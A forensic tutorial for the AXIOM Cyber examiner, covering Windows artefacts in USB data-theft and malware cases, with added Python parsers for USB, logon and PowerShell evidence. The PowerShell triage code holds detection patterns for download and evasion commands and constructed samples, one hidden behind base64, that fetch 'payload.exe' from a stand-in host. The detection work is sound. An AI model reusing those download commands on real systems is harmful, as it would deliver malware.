Axiom Cyber Examiner
Last updated
Dashboard: Check artefact categories—e.g., “Windows Artefacts” (Registry, Prefetch), “PowerShell,” “Event Logs”—to scope the data.
Key Views:
Artefact Explorer: Parsed data (e.g., USB history, Amcache).
File System Explorer: Raw files (C:\Windows\System32).
Timeline: Chronological events.
Connections: Entity relationships.
Example: Dashboard shows 1,000+ “Event Log” hits, 50 “PowerShell” entries, and 10 “USB Device” connections—prioritise accordingly.
Example: “Did ‘jdoe’ exfiltrate ‘Q1Report.docx’ via USB on 15 January 2025?”
Step 2: Explore Key Windows Artefacts
Windows Registry:
Location: Artefact Explorer > Windows > Registry.
Hives:
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR: USB details (serial, connect time).
HKU\[SID]\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs: Recent files.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run: Autorun persistence.
Example: USBSTOR shows serial “1234ABCD” connected “2025-01-15 14:32:21 UTC.”
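The USBSTOR data AXIOM shows on this view is parsed from key names and FILETIME values in the SYSTEM hive. The following is an added example (not AXIOM's or Magnet's code) that does that parsing on constructed registry export data: it splits the device class key into vendor, product and revision, separates a vendor serial from a Windows-generated instance ID, and converts the first-install FILETIME from the instance's Properties subkey to UTC. The sample records and the `utc_to_filetime` helper used to build them are constructed for this example.

```python
"""USBSTOR parsing helpers (added example, not AXIOM's code)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Windows FILETIME: 100 ns ticks since 1601-01-01 00:00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_utc(filetime: int) -> datetime:
    """Convert a raw FILETIME integer to an aware UTC datetime (100 ns ticks -> microseconds)."""
    return _FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def utc_to_filetime(ts: datetime) -> int:
    """Inverse of filetime_to_utc; used below only to build the constructed sample."""
    delta = ts.astimezone(timezone.utc) - _FILETIME_EPOCH
    micros = (delta.days * 86_400 + delta.seconds) * 1_000_000 + delta.microseconds
    return micros * 10


# Device class key directly under USBSTOR, e.g. Disk&Ven_SanDisk&Prod_Cruzer_Glide&Rev_1.00
_DEVICE_KEY_RE = re.compile(
    r"^(?P<dtype>[^&]+)&Ven_(?P<vendor>[^&]*)&Prod_(?P<product>[^&]*)&Rev_(?P<revision>.*)$"
)


@dataclass(frozen=True)
class UsbDevice:
    device_type: str
    vendor: str
    product: str
    revision: str
    serial: str
    serial_is_real: bool      # False when Windows generated the instance ID itself
    first_install_utc: datetime


def parse_instance_id(instance_id: str) -> tuple[str, bool]:
    """Split an instance key such as '1234ABCD&0' into the serial and a 'real serial' flag.

    A device that reports no serial gets a Windows-generated ID whose second character is '&'
    (for example '7&1a2b3c4d&0'); such IDs identify a port/hub slot, not the physical stick.
    """
    generated = instance_id[1:2] == "&"
    serial = instance_id if generated else instance_id.split("&")[0]
    return serial, not generated


def parse_usbstor(records) -> list[UsbDevice]:
    """records: (device_key, instance_id, first_install_filetime) tuples.

    The FILETIME is the 0064 ('first install') value from the instance's Properties subkey;
    0066 (last arrival) and 0067 (last removal) can be handled the same way.
    """
    devices = []
    for device_key, instance_id, filetime in records:
        match = _DEVICE_KEY_RE.match(device_key)
        if match is None:
            continue  # not a USBSTOR-shaped key: skip rather than guess at the layout
        serial, is_real = parse_instance_id(instance_id)
        devices.append(UsbDevice(match["dtype"], match["vendor"], match["product"],
                                 match["revision"], serial, is_real, filetime_to_utc(filetime)))
    return devices


def devices_connected_between(devices, start: datetime, end: datetime) -> list[UsbDevice]:
    """Filter parsed devices to those first installed inside [start, end] (UTC)."""
    return [d for d in devices if start <= d.first_install_utc <= end]


# Constructed sample: the page's serial and timestamp plus a device without a vendor serial.
SAMPLE_USBSTOR = [
    ("Disk&Ven_SanDisk&Prod_Cruzer_Glide&Rev_1.00", "1234ABCD&0",
     utc_to_filetime(datetime(2025, 1, 15, 14, 32, 21, tzinfo=timezone.utc))),
    ("Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07", "7&1a2b3c4d&0",
     utc_to_filetime(datetime(2024, 11, 2, 9, 5, 0, tzinfo=timezone.utc))),
    ("NotAUsbStorKey", "0", 0),
]

if __name__ == "__main__":
    for dev in parse_usbstor(SAMPLE_USBSTOR):
        flag = "" if dev.serial_is_real else " (generated ID, no vendor serial)"
        print(f"{dev.first_install_utc:%Y-%m-%d %H:%M:%S} UTC  {dev.vendor} {dev.product}  "
              f"serial={dev.serial}{flag}")
```

The generated-ID check matters when tying a stick to a person: a serial such as “1234ABCD” can be matched against the same device on other hosts, whereas a Windows-generated ID only says that some serial-less device sat on that port.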
Event Logs:
Location: Artefact Explorer > Windows > Event Logs.
Logs:
Security.evtx: Logons (ID 4624), failures (ID 4625).
System.evtx: Startups (ID 6005), service installs (ID 7045).
Application.evtx: App crashes or anomalies.
Example: ID 4624 logs “jdoe” at “14:30:00 UTC.”
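Reading ID 4624 hits one at a time is slow once the dashboard reports a thousand of them, so the usual first pass is to drop the machine and service accounts, decode the logon type, and flag off-hours logons and logons preceded by a burst of ID 4625 failures. The following added example (not AXIOM's code) runs that triage over constructed Security.evtx records whose keys mirror the EventData field names. The business-hours check assumes the organisation's working day is expressed in the same time zone as the timestamps (UTC here, as on this page); in a real case convert to the site's local time first.

```python
"""Security.evtx logon triage (added example, not AXIOM's code)."""
from __future__ import annotations

from datetime import datetime, timedelta

# Logon types from the 4624 EventData "LogonType" field.
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
               8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
               11: "CachedInteractive"}

# Accounts that log on constantly and rarely say anything about a human user.
NOISE_ACCOUNTS = {"SYSTEM", "ANONYMOUS LOGON", "LOCAL SERVICE", "NETWORK SERVICE"}


def is_noise_account(name: str) -> bool:
    """SYSTEM/service accounts, machine accounts (trailing '$') and Window Manager virtual accounts."""
    upper = name.upper()
    return upper in NOISE_ACCOUNTS or upper.endswith("$") or upper.startswith(("DWM-", "UMFD-"))


def is_off_hours(ts: datetime, business_hours: tuple[int, int] = (8, 18)) -> bool:
    """True on weekends or outside [start, end) hours; ts must be in the organisation's local time."""
    start, end = business_hours
    return ts.weekday() >= 5 or not (start <= ts.hour < end)


def triage_logons(events, business_hours=(8, 18), lookback=timedelta(minutes=10)) -> list[dict]:
    """Keep successful (4624) logons by real accounts; mark off-hours ones and count prior failures."""
    failures = [(datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"])
                for e in events if e["EventID"] == 4625]
    rows = []
    for ev in events:
        if ev["EventID"] != 4624 or is_noise_account(ev["TargetUserName"]):
            continue
        ts = datetime.fromisoformat(ev["TimeCreated"])
        prior = sum(1 for fts, fuser in failures
                    if fuser == ev["TargetUserName"] and ts - lookback <= fts < ts)
        rows.append({
            "time": ts.isoformat(),
            "user": ev["TargetUserName"],
            "domain": ev["TargetDomainName"],
            "logon_type": LOGON_TYPES.get(ev["LogonType"], str(ev["LogonType"])),
            "source_ip": ev.get("IpAddress", "-"),
            "off_hours": is_off_hours(ts, business_hours),
            "failures_before": prior,
        })
    return sorted(rows, key=lambda r: r["time"])


def failed_logons_by_user(events) -> dict[str, int]:
    """Count ID 4625 failures per target account."""
    counts: dict[str, int] = {}
    for ev in events:
        if ev["EventID"] == 4625:
            counts[ev["TargetUserName"]] = counts.get(ev["TargetUserName"], 0) + 1
    return counts


# Constructed sample: the page's 14:30 logon, the noise a real log carries, and the
# page's off-hours case (2:00 AM on 10 January) preceded by two failures.
SAMPLE_SECURITY_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2025-01-15T14:30:00+00:00", "TargetUserName": "jdoe",
     "TargetDomainName": "CORP", "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4624, "TimeCreated": "2025-01-15T14:29:58+00:00", "TargetUserName": "SYSTEM",
     "TargetDomainName": "NT AUTHORITY", "LogonType": 5, "IpAddress": "-"},
    {"EventID": 4624, "TimeCreated": "2025-01-15T14:31:00+00:00", "TargetUserName": "WS01$",
     "TargetDomainName": "CORP", "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "TimeCreated": "2025-01-15T14:30:02+00:00", "TargetUserName": "DWM-1",
     "TargetDomainName": "Window Manager", "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4625, "TimeCreated": "2025-01-10T01:58:00+00:00", "TargetUserName": "jdoe",
     "TargetDomainName": "CORP", "LogonType": 10, "IpAddress": "10.0.0.25"},
    {"EventID": 4625, "TimeCreated": "2025-01-10T01:59:00+00:00", "TargetUserName": "jdoe",
     "TargetDomainName": "CORP", "LogonType": 10, "IpAddress": "10.0.0.25"},
    {"EventID": 4624, "TimeCreated": "2025-01-10T02:00:00+00:00", "TargetUserName": "jdoe",
     "TargetDomainName": "CORP", "LogonType": 10, "IpAddress": "10.0.0.25"},
]

if __name__ == "__main__":
    for row in triage_logons(SAMPLE_SECURITY_EVENTS):
        print(row)
    print("failures:", failed_logons_by_user(SAMPLE_SECURITY_EVENTS))
```

Seven records reduce to two rows worth reading: the 14:30 interactive logon that anchors the Q1Report timeline, and a remote-interactive logon at 02:00 with two failed attempts just before it, which is the kind of anomaly the later “Off-hours logins” note describes.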
Prefetch Files:
Location: Artefact Explorer > Windows > Prefetch.
Purpose: Programme execution evidence.
Example: “WINRAR.EXE-1A2B3C4D.pf” ran “14:35:10 UTC,” referencing “Q1Report.zip.”
LNK Files and Jump Lists:
Location: Artefact Explorer > Windows > LNK Files, Jump Lists.
Purpose: File access history.
Example: “Q1Report.docx.lnk” accessed “14:34:50 UTC.”
Shimcache:
Location: Artefact Explorer > Windows > Shimcache.
Purpose: Historical executions.
Example: “cmd.exe” ran “14:36:00 UTC.”
PowerShell Logs:
Location: Artefact Explorer > Windows > PowerShell.
Logs: Event ID 4104 (Script Block Logging), 4103 (command execution).
Example: “Invoke-WebRequest -Uri ‘ logged at “14:38:00 UTC.”
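Two things make 4104 review harder than the example suggests: long script blocks are logged as several records (ScriptBlockId, MessageNumber, MessageTotal) that must be joined before any pattern matching, and an `-EncodedCommand` argument hides the real content behind base64 of UTF-16LE text. The following added example (not AXIOM's code) reassembles fragments, decodes encoded commands, and scores each block against a small set of defender-side indicators for the download and evasion behaviours this page describes. The records and the `http://example.invalid` addresses are constructed for the example.

```python
"""PowerShell 4104 script block triage (added example, not AXIOM's code)."""
from __future__ import annotations

import base64
import binascii
import re
from collections import defaultdict

# Defender-side indicators for the behaviours the page lists; extend to taste.
INDICATORS = {
    "web download": re.compile(
        r"Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "dynamic execution": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "evasion switches": re.compile(
        r"-ExecutionPolicy\s+Bypass|-WindowStyle\s+Hidden|-NoProfile", re.I),
    "encoded content": re.compile(r"FromBase64String", re.I),
}
# -EncodedCommand (and its abbreviations) takes base64 of a UTF-16LE string.
ENCODED_CMD_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def reassemble(events) -> dict[str, str]:
    """Join fragmented 4104 records (MessageNumber/MessageTotal) back into whole script blocks."""
    fragments: dict[str, dict[int, str]] = defaultdict(dict)
    for ev in events:
        fragments[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    return {sbid: "".join(parts[n] for n in sorted(parts)) for sbid, parts in fragments.items()}


def decode_encoded_commands(text: str) -> list[str]:
    """Return the plaintext of every -EncodedCommand argument found; malformed base64 is skipped."""
    decoded = []
    for m in ENCODED_CMD_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return decoded


def score(text: str) -> set[str]:
    """Indicator names hit by the text, including text recovered from encoded commands."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    inner = decode_encoded_commands(text)
    if inner:
        hits.add("encoded content")
        for plain in inner:
            hits |= score(plain)   # one more layer of encoding is handled by recursion
    return hits


def triage(events) -> dict[str, list[str]]:
    """Map each reassembled ScriptBlockId to its sorted list of indicator hits."""
    return {sbid: sorted(score(text)) for sbid, text in reassemble(events).items()}


# Constructed sample in the shape of 4104 EventData. Block "A" arrives as two fragments,
# out of order; block "C" carries its payload as an encoded command.
_ENCODED = base64.b64encode(
    "Invoke-WebRequest -Uri 'http://example.invalid/x' -OutFile x.exe".encode("utf-16-le")
).decode("ascii")
SAMPLE_4104 = [
    {"ScriptBlockId": "A", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "Invoke-WebRequest -Uri $u -OutFile payload.exe"},
    {"ScriptBlockId": "A", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$u = 'http://example.invalid/payload'; "},
    {"ScriptBlockId": "B", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem 'C:\\Users\\jdoe\\Documents' | Measure-Object"},
    {"ScriptBlockId": "C", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": f"powershell.exe -WindowStyle Hidden -EncodedCommand {_ENCODED}"},
]

if __name__ == "__main__":
    for sbid, hits in triage(SAMPLE_4104).items():
        print(sbid, hits or "no indicators")
```

Matching only the raw ScriptBlockText would miss block “C” entirely; decoding first is what surfaces the same `Invoke-WebRequest` the page's example shows in the clear.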
Amcache:
Location: Artefact Explorer > Windows > Amcache.
Purpose: Tracks executable metadata (SHA1, install time).
Example: “notepad.exe” SHA1 matches a known dropper, executed “14:37:00 UTC.”
BITS:
Location: Artefact Explorer > Windows > BITS Jobs.
Purpose: Background file transfers (e.g., malware downloads).
Example: BITS job downloaded “payload.exe” from “ at “14:39:00 UTC.”
WMI:
Location: Artefact Explorer > Windows > WMI.
Purpose: Persistence or remote execution (e.g., WMI Event Consumers).
Example: “WmiPrvSE.exe” triggered “cmd.exe” at “14:40:00 UTC.”
SRUM:
Location: Artefact Explorer > Windows > SRUM.
Purpose: App usage and network activity.
Example: “winrar.exe” used 50MB at “14:35:00 UTC.”
Step 3: Build a Timeline
Steps: Timeline view > Filter “2025-01-15 14:00:00 - 15:00:00 UTC” > Add “Event Logs,” “Prefetch,” “LNK,” “USB,” and “PowerShell.”
Example: Logon (14:30) → File access (14:34) → WinRAR (14:35) → USB (14:32).
Step 4: Correlate with Connections
Steps: Tag “jdoe” and “1234ABCD” as Profiles > Map links (e.g., “jdoe” to “Q1Report.zip” to USB).
Example: Visual confirms “jdoe” tied to file and USB.
Keyword Search:
Steps: Search > “Q1Report” or regex (e.g., \b[A-Za-z0-9]{8}\b for serials).
Example: Hits in LNK, RecentDocs, and carved “Q1Report.zip.”
File System Deep Dive:
Steps: File System Explorer > C:\Windows\System32\winevt\Logs or unallocated space.
Example: Recover deleted “cmd.exe-5D6E7F8G.pf” from unallocated space.
Memory Analysis:
Steps: Artefact Explorer > Memory > Check processes and network connections.
Example: “cmd.exe” spawned “ftp.exe” at “14:37:00 UTC.”
AXIOM Power Features:
Custom Artefacts: Define new parsers (e.g., for custom app logs) via AXIOM’s Artefact Definition tool.
Scripting: Batch tag artefacts with Python (e.g., all “PowerShell” hits as “suspicious”).
Example: Script tags 50 PowerShell commands in 10 seconds.
Edge Cases:
Wiped Logs: Pivot to MFT (File System Explorer > $MFT) for file timestamps or memory for process history.
Example: MFT shows “Q1Report.zip” last modified “14:35:15 UTC” despite cleared logs.
Encrypted Drives: If BitLocker-locked, use the recovery key (if available) during acquisition; otherwise, analyse memory or cloud sync logs.
Example: OneDrive log shows “Q1Report.zip” uploaded “14:45:00 UTC.”
Context: USB + LNK + Prefetch = likely exfiltration.
Example: “Q1Report.zip” (14:35) + USB (14:32) suggests data theft.
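The Step 3 timeline, the “USB + LNK + Prefetch” rule above and the batch-tagging idea under AXIOM Power Features are three views of the same job: normalise every artefact's timestamp to UTC, sort, then look for the sequence. The following added example (not AXIOM's code or scripting API) does all three over constructed records built from this page's timestamps: one LNK row is deliberately exported in local time (UTC-5) and one Shimcache row has no offset, to show the normalisation; the exfiltration check requires all three legs inside a ten-minute window after the USB connection, so a lone Prefetch hit such as svchost.exe is never tagged by itself. Source names, the `Event` model and the ten-minute window are assumptions of the example.

```python
"""Timeline merge, exfiltration-chain correlation and batch tagging (added example, not AXIOM's code)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

UTC = timezone.utc


@dataclass
class Event:
    ts: datetime                 # always aware UTC after normalisation
    source: str                  # artefact category, named as AXIOM labels it
    summary: str
    user: str = ""
    tags: set[str] = field(default_factory=set)


def normalise_ts(value: str) -> datetime:
    """ISO-8601 with an offset is converted to UTC; a value with no offset is assumed UTC."""
    ts = datetime.fromisoformat(value)
    if ts.tzinfo is None:
        ts = ts.replace(tzinfo=UTC)
    return ts.astimezone(UTC)


def build_timeline(records, start: str, end: str, sources=None) -> list[Event]:
    """Step 3: merge per-artefact records, keep chosen sources inside [start, end], sort by time."""
    lo, hi = normalise_ts(start), normalise_ts(end)
    events = []
    for source, raw_ts, summary, user in records:
        if sources is not None and source not in sources:
            continue
        ts = normalise_ts(raw_ts)
        if lo <= ts <= hi:
            events.append(Event(ts, source, summary, user))
    return sorted(events, key=lambda e: e.ts)


FILE_ACCESS_SOURCES = {"LNK", "Jump Lists", "RecentDocs"}
EXECUTION_SOURCES = {"Prefetch", "Shimcache", "Amcache"}
ARCHIVER_RE = re.compile(r"WINRAR|7-?ZIP|\b7Z\b|\bZIP\b|\bRAR\b", re.I)


def find_exfil_chains(timeline, window=timedelta(minutes=10), tag="Exfiltration Evidence"):
    """USB connect followed, within `window`, by a file access and an archiver execution.

    All three legs are required (the page's 'USB + LNK + Prefetch' rule); matching events
    are tagged in place and each chain is returned for the report.
    """
    chains = []
    for usb in (e for e in timeline if e.source == "USB"):
        later = [e for e in timeline if e is not usb and usb.ts <= e.ts <= usb.ts + window]
        file_access = [e for e in later if e.source in FILE_ACCESS_SOURCES]
        archivers = [e for e in later
                     if e.source in EXECUTION_SOURCES and ARCHIVER_RE.search(e.summary)]
        if file_access and archivers:
            for e in (usb, *file_access, *archivers):
                e.tags.add(tag)
            chains.append({"usb": usb, "file_access": file_access, "archivers": archivers})
    return chains


def batch_tag(timeline, predicate, tag: str) -> int:
    """Tag every event matching predicate (e.g. all PowerShell hits); returns how many were tagged."""
    count = 0
    for e in timeline:
        if predicate(e):
            e.tags.add(tag)
            count += 1
    return count


# Constructed sample using the page's timestamps. The last two rows fall outside the
# 14:00-15:00 window and are dropped by build_timeline.
SAMPLE_RECORDS = [
    ("Event Logs", "2025-01-15T14:30:00+00:00", "ID 4624 logon", "jdoe"),
    ("USB", "2025-01-15T14:32:21+00:00", "USBSTOR serial 1234ABCD connected", ""),
    ("LNK", "2025-01-15T09:34:50-05:00", "Q1Report.docx.lnk accessed", "jdoe"),
    ("Prefetch", "2025-01-15T14:35:10+00:00", "WINRAR.EXE-1A2B3C4D.pf run, references Q1Report.zip", ""),
    ("Shimcache", "2025-01-15T14:36:00", "cmd.exe executed", ""),
    ("PowerShell", "2025-01-15T14:38:00+00:00", "ID 4104 Invoke-WebRequest script block", "jdoe"),
    ("Event Logs", "2025-01-15T16:10:00+00:00", "ID 4624 logon", "SYSTEM"),
    ("Prefetch", "2025-01-14T10:00:00+00:00", "WINRAR.EXE-1A2B3C4D.pf run", ""),
]
WINDOW = ("2025-01-15T14:00:00+00:00", "2025-01-15T15:00:00+00:00")

if __name__ == "__main__":
    tl = build_timeline(SAMPLE_RECORDS, *WINDOW)
    chains = find_exfil_chains(tl)
    batch_tag(tl, lambda e: e.source == "PowerShell", "suspicious")
    for e in tl:
        print(f"{e.ts:%H:%M:%S} UTC  {e.source:<10} {e.summary}  {sorted(e.tags)}")
    print(f"{len(chains)} exfiltration chain(s) found")
```

Sorted this way the page's chain reads 14:30 logon, 14:32 USB, 14:34 LNK, 14:35 WinRAR, which is the order the report should present it in; the USB connection precedes the file access and the archive, which is what makes the sequence read as staging for removal rather than coincidence.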
False Positives: Ignore “svchost.exe” Prefetch unless tied to user actions.
Anomalies: Off-hours logins (e.g., 2:00 AM on 10 January) or rare tools (e.g., “psexec.exe”).
Tagging: Tag “Exfiltration Evidence” (USB, LNK).
Visuals: Export Timeline PNG (14:30-14:40).
Report: PDF with artefacts, notes, and raw logs (e.g., “ID 4624, jdoe, 14:30”).
Portable Case: Share the .mfc file for collaboration.
Insider Theft:
Findings: Logon (14:30) → “Q1Report.docx” (14:34) → WinRAR (14:35) → USB “1234ABCD” (14:32).
Conclusion: “jdoe” exfiltrated data.
Malware Infection:
Findings: BITS job downloads “payload.exe” (14:39) → Amcache logs execution (14:40) → PowerShell “Invoke-WebRequest” (14:38) → WMI persistence (14:40) → SRUM shows network spike (14:41).
Timeline:
14:38: PowerShell downloads malware.
14:39: BITS completes the transfer.
14:40: WMI triggers execution.
Conclusion: Malware deployed via the web and persisted via WMI.
Volatility: Export memory dump (File System Explorer) > Analyse with Volatility's pslist or netscan plugins.
Example: “ftp.exe” connected to “192.168.1.100” confirms exfiltration.
RegRipper: Export hives (e.g., SYSTEM) > Parse for deeper USB or Run key details.
Example: RegRipper finds “payload.exe” in Run key missed by AXIOM.
Cross-Check: Registry USB times vs. raw USBSTOR hive.
Raw Data: Export Security.evtx for external parsing (e.g., Event Log Explorer).
Filters: Exclude “SYSTEM” logons unless relevant.
Registry Pivot: From USBSTOR to MountedDevices for drive letters.
Batch Export: Multi-select Event Logs to CSV.